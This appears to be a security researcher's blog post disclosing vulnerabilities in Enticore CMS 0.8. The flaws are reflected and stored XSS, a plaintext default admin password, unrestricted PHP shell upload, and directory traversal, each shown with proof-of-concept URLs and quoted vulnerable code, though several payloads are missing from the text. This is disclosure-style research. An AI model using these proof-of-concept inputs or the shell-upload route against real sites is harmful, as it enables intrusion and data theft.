Once upon a day I decide to sit back and enjoy a few moments of ‘free time’ spending for vulnerability research in some popular CMS applications.
First I’ve found Enticore CMS 0.8 ( avaliable at http://sourceforge.net/projects/enticore/ ).
I decide to download it and install in my lab-box :)
To make this news more precisely:
„the lab” configuration was: Ubuntu 10.10 with Apache 2.2.16, and PHP 5.3.3. One more important think is that, I set display_errors = On
in php.ini file.
So first what I’ve done was install it on my test lab.
Nothing special in this process but here I found first Cross Site Scripting vulnerability.
1) Cross Site Scripting in ‘install.php’:
Here we go: when we set „include/external/” to 777, we can click to the „next step” of installation process. Our link will be:
http://enticore-0.8/install.php?page=DatabaseBackend
First I tried to make some ../ request for $page parameter, but there was ‘only’ an error:
‘Notice: Undefined index: ../ in ./enticore-0.8/install.php on line 66 Fatal error: Call to
a member function getPage() on a non-object in ./enticore-0.8/install.php on line 67 ‘
Ok, so lets see, what is behind line 66-67:
—cut—
63 function getPage($page) {
64 global $installationSteps;
65
66 $installationStep = $installationSteps[$page]['item'];
67 $retval = $installationStep->getPage();
—cut—
We must definetly choose one of the ‘item’. So I tried to ‘choose’ item, that not exist.
For example: testujto:
—cut—
Notice: Undefined index: testujto in (…) line 66.
—cut—
Ok. Once again, error output informed me, that ‘item’ I decided to use is placed ‘like I wrote it’ in $page parameter.
So next test will be simple
And here we have our ‘Cross Site Scripting vulnerability’. Checked in source (view source) looks like this:
—cut—
—cut—
So vulnerability exist, and there is a possibility to send malformed URL to the victim with JS/HTML payload.
PoC could look like this:
2) XSS in ./include/plugin/EnticorePluginUsers.php
—cut—
241 return Helper::getMessage(‘warn.png’, _(‘Login incorrect, please try again.’)).$this->getLoginForm($_POST['username']);
—cut—
Vulnerability founded here is the same. Enticore not properely validate user input.
So we have another one Cross Site Scripting:
—cut—
POST http://enticore-0.8/index.php?plugin=EnticorePluginUsers&site=login
$username=you <— try to put here some POST values, for example y0
—cut—
Remember, this vulnerable was checked with „display_error = On”! (Some more info about errors in webapps, maybe soon...;))
3) Vulnerabilities for ‘Logged only’.
Now is time for searching some vulnerabilities for logged users. First one has been found for $site parameter.
(Default password for admin is ‘enticore’.)
PoC :
(GET send to logged user) http://enticore-0.8/index.php?plugin=EnticorePluginUsers&site=’>
Vulnerable code:
—cut—
/enticore-0.8$ cat -n ./include/plugin/EnticorePluginUsers.php | grep site
32 * @see include/plugin/EnticorePlugin#getMenuEntries($site)
34 public function getMenuEntries($site) {
38 array_push($retval, array(‘uri’ => $this->generatePluginPart(‘admin’),
‘site’ => ‘admin’, ‘name’ => _(‘Administrate users’), ‘css’ => $this->getSelectedCss(‘admin’)));
40 array_push($retval, array(‘uri’ => $this->generatePluginPart(‘logout’),
‘site’ => ‘logout’, ‘name’ => _(‘Logout’), ‘css’ => $this->getSelectedCss(null, $site != ‘admin’)));
43 array_push($retval, array(‘uri’ => $this->generatePluginPart(‘login’),
‘site’ => ‘login’, ‘name’ => _(‘Login’), ‘css’ => $this->getSelectedCss(null, $site != ‘admin’)));
49 public function getContent($site) {
50 if ($site == ‘login’) {
52 } else if ($site == ‘logout’) {
54 } else if ($site == ‘admin’ || $site == ‘show’) {
56 } else if ($site == ‘add’) {
58 } else if ($site == ‘edit’) {
60 } else if ($site == ‘delete’) {
63 return get_class($this).’: Unkown site ‘.$site;
—cut—
I uderstand this vuln as: get_class is no properly validated, so the PoC can be placed in line 63 of EnticorePluginUsers.php.
Payload for test could be: ‘>testtest2 or whatever you want in HTML/JavaScript.
You should already knew, if there will be something like:
—cut—
(…) switch { if 1 then… if 2, then…, else if anyDifferentSiteValue, and here else Default } (…)
—cut—
the vulnerability should not exist. So think about it how You write your if/else part of code;)
4) DB password stored in clear-text.
—cut—
mysql> use enticore;
Database changed
mysql> select * from ec_users limit 1;
+—–+———-+———-+————+———————-+————————+——–+
| idx | username | password | encryption | email | name | status |
+—–+———-+———-+————+———————-+————————+——–+
| 1 | admin | enticore | plain | admin@yourdomain.com | Enticore Administrator | 1 |
+—–+———-+———-+————+———————-+————————+——–+
1 row in set (0.00 sec)
mysql>
—cut—
Very, very nice! :)
5) Shell upload is possible.
Enticore CMS has a nice page for uploading files via web browser when You’re logged.
First, what „bad hackers” do is trying to upload some kind of shell in PHP, to better
remote access. When we upload a shell in php (shell.php), Enticore, puts in in $webroot/content/shell.php.
File is accessable via web browser, so for this time is game over.
Good practice here is to think about what kind of files could and should be possible to upload.
6) Directory traversal attack (for logged only):
I looked at the source of this CMS and there is opendir() function. Like I thought, we can do a directory traversal attack :
PoC:
http://enticore-0.8/index.php?plugin=EnticorePluginUpload&site=upload&dir=../../../../../../../../../../../../../home/
Be cause of vulnerability in source code:
— cut include/helper/Helper.php —
$ cat -n include/helper/Helper.php | grep opendir
109 if ($handle = opendir($dir)) {
139 if ($handle = opendir($dir)) {
301 $handle = opendir($path.’/');
— cut include/helper/Helper.php —
7) stored XSS in http://enticore-0.8/index.php?plugin=EnticorePluginConfiguration
Try $title too. It is vulnerable to stored xss attack… ;)
Testing in progres...
No comments:
Post a Comment
What do You think...?